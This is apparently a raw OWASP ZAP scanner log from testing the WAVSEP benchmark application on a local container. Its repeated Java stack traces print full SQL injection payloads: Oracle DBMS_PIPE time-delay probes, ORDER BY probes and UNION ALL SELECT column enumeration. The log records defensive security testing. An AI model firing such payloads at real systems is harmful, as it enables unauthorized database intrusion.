9892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(68)||CHR(103)||CHR(72),5) AND (7960=7960 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682480 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8099=DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(97)||CHR(98)||CHR(97),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8099=DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(97)||CHR(98)||CHR(97),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682481 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 9647=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(109)||CHR(107)||CHR(86),5) AND ('NIgL'='NIgL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 9647=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(109)||CHR(107)||CHR(86),5) AND ('NIgL'='NIgL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682482 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 1072=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(69)||CHR(83)||CHR(102),5) AND 'gNrd'='gNrd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1072=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(69)||CHR(83)||CHR(102),5) AND 'gNrd'='gNrd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682482 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 1372=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(75)||CHR(65)||CHR(83),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1372=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(75)||CHR(65)||CHR(83),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682483 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 5700=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(87)||CHR(90)||CHR(87),5)-- ZWmm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5700=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(87)||CHR(90)||CHR(87),5)-- ZWmm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682484 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682485 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 6456-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 6456-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682486 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682486 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682487 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682488 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682489 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682490 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at 